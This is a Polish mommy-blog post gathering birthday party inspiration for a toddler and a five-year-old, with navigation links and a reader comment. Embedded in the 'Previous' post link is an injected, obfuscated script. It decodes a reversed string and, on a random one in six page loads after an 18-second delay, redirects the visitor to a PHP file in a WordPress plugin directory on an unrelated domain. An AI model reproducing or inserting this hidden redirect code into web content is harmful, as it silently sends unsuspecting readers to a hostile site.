Urodzinowe inspiracje!


Niedawno, zupełnie przez przypadek odkryłam, że do pierwszych urodzin Niny został niewiele ponad miesiąc. Nie wiem, gdzie podziały się ostatnie miesiące i mówiąc szczerze, jeszcze to do mnie nie dociera. Sama wizja organizacji jej pierwszej poważnej imprezy, to nadal czysta abstrakcja. Tymczasem zaraz będzie sierpień a później już poleci z górki – czasu wcale nie zostało tak dużo!

Zaczęłam szukać inspiracji na rodzinną imprezę urodzinową. Na motyw przewodni jest jeszcze za wcześnie, zresztą Roczek to i tak bardziej święto dla dorosłych, niż dla małych jubilatów. Nie planujemy nic wielkiego i dekoracje też będą raczej skromne, ale szperając w Sieci od razu rzuciłam okiem na pomysły imprez dla starszaków. I tym sposobem zebrałam w jednym miejscu całkiem pokaźną liczbę inspiracji na przyjemne i smaczne zabawy – w gronie rodziny, czy też dla grupki rówieśników.

PROSTO, ALE Z KLASĄ

 

W KOLORZE

 

Z MOTYWEM

 

 

NA BOGATO

 

ATRAKCJE!

Piąte urodziny Antka będą pierwszą imprezą, na którą zaprosi koleżanki i kolegów. I dlatego absolutnie urzekły mnie poniższe propozycje na miejsca do zdjęć pamiątkowych. Motyw przewodni imprezy na pewno będziemy musieli uzgodnić z jubilatem, ale liczba możliwości dekoracji jest praktycznie nieograniczona. Wyjątkowa pamiątka zapewniona 🙂

39a207d7763dcec31a6f66e88312cfd1

 

(zdjęcie główne: flickr.com, zdjęcia pozostałe: pinterest.com)

Previous His<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>toria pewnej wpadki.
Next O tym, jak rodzinę spakowałam i nie zwariowałam.

Suggested Posts

Cześć 2016!

Na śniadanie.

12 powodów, by odwiedzić Wrocław i zakochać się na zabój.

Kryzys.

Rodzice, ja Was proszę: Ogarnijcie się!

Zanim pójdziesz z dzieckiem do kina …

1 Comment

  1. Matko Zabawko
    23 lipca 2015
    Odpowiedz

    Na roczek naszym motywem przewodnim był Kubuś Puchatek 🙂
    Nie szalałam, zawiesiłam kilka banerków, żółto-czerwone balony, kubusiowy obrus. Jak dla mnie wyszło bardzo fajnie. Kolejne urodziny będą dla mnie wyzwaniem! Postaram się zorganizować jak najlepsze urodzinowe party 🙂

Leave a reply

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *